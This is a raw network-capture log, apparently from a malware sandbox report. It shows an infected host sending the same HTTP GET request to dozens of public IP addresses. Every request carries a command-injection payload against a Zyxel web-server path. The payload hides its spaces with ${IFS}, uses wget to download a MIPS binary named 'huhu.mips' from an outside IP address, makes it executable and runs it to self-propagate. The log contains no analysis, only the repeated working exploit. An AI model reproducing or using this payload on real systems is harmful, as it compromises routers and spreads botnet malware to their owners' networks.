                                                        Feb 2, 2024 06:21:21.161001921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7210192.168.2.1458704121.129.203.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161042929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7211192.168.2.145942652.249.47.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161066055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7212192.168.2.1459776170.235.173.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161099911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7213192.168.2.1452998188.93.225.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161164045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7214192.168.2.1435602197.68.14.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161190033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7215192.168.2.145542694.75.63.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161242962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7216192.168.2.1454434158.178.95.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161267996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7217192.168.2.1452386167.34.188.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161298037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7218192.168.2.1436520122.169.189.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161318064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7219192.168.2.145799850.4.10.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161385059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7220192.168.2.1446436124.11.227.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161418915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7221192.168.2.1441302131.135.57.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161468029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7222192.168.2.1437384195.144.19.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161487103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7223192.168.2.144025295.66.193.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161525011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7224192.168.2.145030076.21.73.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161561966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7225192.168.2.1453628170.11.94.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161607981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7226192.168.2.1454712212.69.213.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161642075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7227192.168.2.1446884130.144.117.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161678076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7228192.168.2.1438028207.178.162.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161721945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7229192.168.2.1447598158.211.94.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161756992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7230192.168.2.144779490.162.100.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161780119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7231192.168.2.1434376122.33.77.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161840916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7232192.168.2.143436625.168.151.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161865950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7233192.168.2.144924432.158.133.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161901951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7234192.168.2.145770891.225.48.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161928892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7235192.168.2.145190896.36.216.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.161959887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7236192.168.2.143329027.170.193.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162019014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7237192.168.2.144923261.183.21.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162053108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7238192.168.2.1433164122.211.42.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162094116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7239192.168.2.1453634170.207.21.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162143946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7240192.168.2.1433368190.207.213.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162190914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7241192.168.2.143602489.216.130.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162230968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7242192.168.2.1442342188.253.6.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162271023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7243192.168.2.1436710112.110.192.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162321091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7244192.168.2.1442842160.155.23.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162381887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7245192.168.2.143759889.159.139.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162420034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7246192.168.2.143393669.23.7.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162456036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7247192.168.2.1453534119.43.95.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162501097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7248192.168.2.145306850.1.148.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162554026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7249192.168.2.144629044.131.254.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162600040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7250192.168.2.143554631.136.27.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162606955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7251192.168.2.144605081.98.139.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162628889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7252192.168.2.1436966112.169.122.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162703037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7253192.168.2.1460306146.174.182.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162728071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7254192.168.2.1451962188.157.170.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162796974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7255192.168.2.1446650207.66.232.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162837029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7256192.168.2.145739896.98.40.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162858963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7257192.168.2.1443074151.162.193.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162916899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7258192.168.2.1438640209.109.182.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162949085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7259192.168.2.1438794193.79.242.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.162992954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7260192.168.2.1439560121.82.232.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163042068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7261192.168.2.1460818220.181.182.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163067102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7262192.168.2.144624040.81.243.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163095951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7263192.168.2.1453574179.149.145.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163145065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7264192.168.2.14353582.252.216.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163167953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7265192.168.2.144344867.10.206.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163206100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7266192.168.2.1433772113.134.98.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163234949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7267192.168.2.145417444.217.116.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163290024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7268192.168.2.1448996147.252.40.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163316011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7269192.168.2.1447210107.120.74.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163369894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7270192.168.2.1460734178.107.39.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163405895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7271192.168.2.1448326161.30.172.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.163450956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7272192.168.2.1433686222.78.110.105443
                                                        TimestampBytes transferredDirectionData
